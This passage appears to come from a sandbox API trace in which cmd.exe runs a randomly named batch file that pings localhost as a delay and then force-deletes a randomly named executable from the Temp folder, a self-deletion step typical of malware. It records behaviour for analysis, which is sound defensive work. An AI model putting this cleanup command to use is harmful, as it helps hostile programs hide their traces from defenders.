[0109.495] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.495] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f20c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f20c*=0x19) returned 1 [0109.495] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.495] GetFileType (hFile=0x7) returned 0x2 [0109.495] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.495] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f464 | out: lpMode=0x28f464) returned 1 [0109.495] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.495] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x330958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x28f490, lpReserved=0x0 | out: lpBuffer=0x330958*, lpNumberOfCharsWritten=0x28f490*=0x4) returned 1 [0109.495] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f49c | out: _Buffer=" -n 3 localhost ") returned 16 [0109.495] _get_osfhandle 
(_FileHandle=1) returned 0x7 [0109.495] GetFileType (hFile=0x7) returned 0x2 [0109.495] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.495] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f45c | out: lpMode=0x28f45c) returned 1 [0109.496] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.496] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x28f488, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f488*=0x10) returned 1 [0109.496] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f4bc | out: _Buffer="\r\n") returned 2 [0109.496] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.496] GetFileType (hFile=0x7) returned 0x2 [0109.496] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.496] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f47c | out: lpMode=0x28f47c) returned 1 [0109.496] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.496] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f4a8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f4a8*=0x2) returned 1 [0109.496] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0109.496] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0109.496] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0109.496] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0109.496] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0109.496] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0109.496] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0109.496] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0109.496] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0109.496] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0109.496] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0109.496] _wcsicmp (_String1="ping", _String2="PAUSE") 
returned 8 [0109.496] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0109.496] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0109.497] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0109.497] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0109.497] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0109.497] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0109.497] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0109.497] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0109.497] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0109.497] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0109.497] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0109.497] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0109.497] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0109.497] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0109.497] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0109.497] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0109.497] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0109.497] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0109.497] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0109.497] _wcsicmp (_String1="ping", _String2="START") returned -3 [0109.497] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0109.497] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0109.497] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0109.497] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0109.497] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0109.497] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0109.497] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0109.497] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0109.497] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0109.497] _wcsicmp 
(_String1="ping", _String2="MKLINK") returned 3 [0109.497] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0109.497] SetErrorMode (uMode=0x0) returned 0x0 [0109.497] SetErrorMode (uMode=0x1) returned 0x0 [0109.497] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x340550, lpFilePart=0x28f260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f260*="Desktop") returned 0x18 [0109.497] SetErrorMode (uMode=0x0) returned 0x1 [0109.498] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0109.498] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0109.498] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.498] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.498] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28efdc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28efdc) returned 0xffffffff [0109.498] GetLastError () returned 0x2 [0109.498] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x28efdc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28efdc) returned 0xffffffff [0109.498] GetLastError () returned 0x2 [0109.498] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.499] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28efdc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28efdc) returned 0x340838 [0109.499] FindClose (in: hFindFile=0x340838 | out: hFindFile=0x340838) returned 1 [0109.499] FindFirstFileExW (in: 
lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x28efdc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28efdc) returned 0xffffffff [0109.499] GetLastError () returned 0x2 [0109.499] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x28efdc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28efdc) returned 0x340838 [0109.499] FindClose (in: hFindFile=0x340838 | out: hFindFile=0x340838) returned 1 [0109.499] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0109.499] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0109.499] GetConsoleTitleW (in: lpConsoleTitle=0x28f02c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.499] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0109.499] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0109.499] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.499] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.500] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28e8c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e8c8) returned 0xffffffff [0109.500] GetLastError () returned 0x2 [0109.500] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x28e8c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e8c8) returned 0xffffffff [0109.500] GetLastError () returned 0x2 [0109.500] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.500] 
FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28e8c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e8c8) returned 0x340d80 [0109.500] FindClose (in: hFindFile=0x340d80 | out: hFindFile=0x340d80) returned 1 [0109.500] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x28e8c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e8c8) returned 0xffffffff [0109.500] GetLastError () returned 0x2 [0109.500] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x28e8c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e8c8) returned 0x340d80 [0109.500] FindClose (in: hFindFile=0x340d80 | out: hFindFile=0x340d80) returned 1 [0109.500] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0109.500] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0109.500] GetConsoleTitleW (in: lpConsoleTitle=0x28edc0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.501] InitializeProcThreadAttributeList (in: lpAttributeList=0x28ec48, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ed10 | out: lpAttributeList=0x28ec48, lpSize=0x28ed10) returned 1 [0109.501] UpdateProcThreadAttribute (in: lpAttributeList=0x28ec48, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ed08, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28ec48, lpPreviousValue=0x0) returned 1 [0109.501] GetStartupInfoW (in: lpStartupInfo=0x28ec04 | out: lpStartupInfo=0x28ec04*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0109.501] lstrcmpW 
(lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0109.502] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28eca4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28ecf0 | out: lpCommandLine="ping -n 3 localhost", lpProcessInformation=0x28ecf0*(hProcess=0x54, hThread=0x58, dwProcessId=0xd10, dwThreadId=0xd14)) returned 1 [0109.505] CloseHandle (hObject=0x58) returned 1 [0109.505] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0109.505] GetEnvironmentStringsW () returned 0x330970* [0109.505] FreeEnvironmentStringsW (penv=0x330970) returned 1 [0109.505] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0112.401] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x28ebe4 | out: lpExitCode=0x28ebe4*=0x0) returned 1 [0112.401] CloseHandle (hObject=0x54) returned 1 [0112.401] _vsnwprintf (in: _Buffer=0x28ed2c, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ebf0 | out: _Buffer="00000000") returned 8 [0112.401] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0112.401] GetEnvironmentStringsW () returned 0x332c28* [0112.401] FreeEnvironmentStringsW (penv=0x332c28) returned 1 [0112.401] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0112.401] GetEnvironmentStringsW () returned 0x332c28* [0112.401] FreeEnvironmentStringsW (penv=0x332c28) returned 1 [0112.401] DeleteProcThreadAttributeList (in: lpAttributeList=0x28ec48 | out: lpAttributeList=0x28ec48) 
[0112.401] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.401] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0112.401] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.401] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0112.402] _get_osfhandle (_FileHandle=0) returned 0x3 [0112.402] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0112.402] SetConsoleInputExeNameW () returned 0x1 [0112.402] GetConsoleOutputCP () returned 0x1b5 [0112.402] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0112.402] SetThreadUILanguage (LangId=0x0) returned 0x409 [0112.402] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\gy2dwmvf.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f464, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0112.402] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0112.402] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.402] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0112.403] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.403] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0112.403] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f448, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f448*=0x7c, lpOverlapped=0x0) returned 1 [0112.404] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0112.404] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, 
lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"\r\n") returned 62 [0112.404] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.404] GetFileType (hFile=0x54) returned 0x1 [0112.404] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.404] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0112.405] _tell (_FileHandle=3) returned 83 [0112.405] _close (_FileHandle=3) returned 0 [0112.405] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f21c | out: _Buffer="\r\n") returned 2 [0112.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.405] GetFileType (hFile=0x7) returned 0x2 [0112.405] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.405] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f1dc | out: lpMode=0x28f1dc) returned 1 [0112.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.405] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f208, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f208*=0x2) returned 1 [0112.405] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0112.405] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0112.406] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f218 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0112.406] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f218 | out: _Buffer=">") returned 1 [0112.406] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.406] GetFileType (hFile=0x7) returned 0x2 [0112.406] GetStdHandle (nStdHandle=0xfffffff5) returned 
0x7 [0112.406] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f1e0 | out: lpMode=0x28f1e0) returned 1 [0112.406] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.406] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f20c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f20c*=0x19) returned 1 [0112.406] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.406] GetFileType (hFile=0x7) returned 0x2 [0112.406] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.406] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f464 | out: lpMode=0x28f464) returned 1 [0112.406] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.406] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x33f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x28f490, lpReserved=0x0 | out: lpBuffer=0x33f008*, lpNumberOfCharsWritten=0x28f490*=0x3) returned 1 [0112.407] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f49c | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" ") returned 58 [0112.407] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.407] GetFileType (hFile=0x7) returned 0x2 [0112.407] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.407] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f45c | out: lpMode=0x28f45c) returned 1 [0112.407] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.407] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x28f488, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f488*=0x3a) returned 1 [0112.407] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f4bc | out: _Buffer="\r\n") returned 2 [0112.407] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.407] GetFileType (hFile=0x7) returned 0x2 [0112.407] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.407] 
GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f47c | out: lpMode=0x28f47c) returned 1 [0112.407] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.407] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f4a8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f4a8*=0x2) returned 1 [0112.408] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0112.408] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0112.408] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0112.408] GetConsoleTitleW (in: lpConsoleTitle=0x28f02c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.408] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x28e0a4, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x28e0a8, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x28e0a4*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0112.408] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0112.408] _wcsicmp (_String1="F8a3iwA6.exe", _String2=".") returned 56 [0112.408] _wcsicmp (_String1="F8a3iwA6.exe", _String2="..") returned 56 [0112.408] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 0x2020 [0112.408] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0112.408] _wcsicmp (_String1="F8a3iwA6.exe", _String2=".") returned 56 [0112.408] _wcsicmp (_String1="F8a3iwA6.exe", _String2="..") returned 56 [0112.409] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 
0x2020 [0112.409] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe", fInfoLevelId=0x0, lpFindFileData=0x340554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x340554) returned 0x320aa8 [0112.409] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 1 [0112.409] FindNextFileW (in: hFindFile=0x320aa8, lpFindFileData=0x340554 | out: lpFindFileData=0x340554) returned 0 [0112.410] GetLastError () returned 0x12 [0112.410] FindClose (in: hFindFile=0x320aa8 | out: hFindFile=0x320aa8) returned 1 [0112.410] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.410] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0112.410] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.410] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0112.410] _get_osfhandle (_FileHandle=0) returned 0x3 [0112.410] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0112.411] SetConsoleInputExeNameW () returned 0x1 [0112.411] GetConsoleOutputCP () returned 0x1b5 [0112.411] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0112.411] SetThreadUILanguage (LangId=0x0) returned 0x409 [0112.411] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\gy2dwmvf.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f464, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0112.411] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0112.411] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.411] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) 
returned 0x53 [0112.411] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.411] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0112.411] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f448, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f448*=0x3e, lpOverlapped=0x0) returned 1 [0112.412] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"\r\n") returned 62 [0112.412] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.412] GetFileType (hFile=0x54) returned 0x1 [0112.412] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.412] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0112.413] _tell (_FileHandle=3) returned 145 [0112.413] _close (_FileHandle=3) returned 0 [0112.413] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f21c | out: _Buffer="\r\n") returned 2 [0112.413] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.413] GetFileType (hFile=0x7) returned 0x2 [0112.413] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.413] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f1dc | out: lpMode=0x28f1dc) returned 1 [0112.413] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.413] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f208, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f208*=0x2) returned 1 [0112.414] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0112.414] _vsnwprintf (in: _Buffer=0x4a9e5e40, 
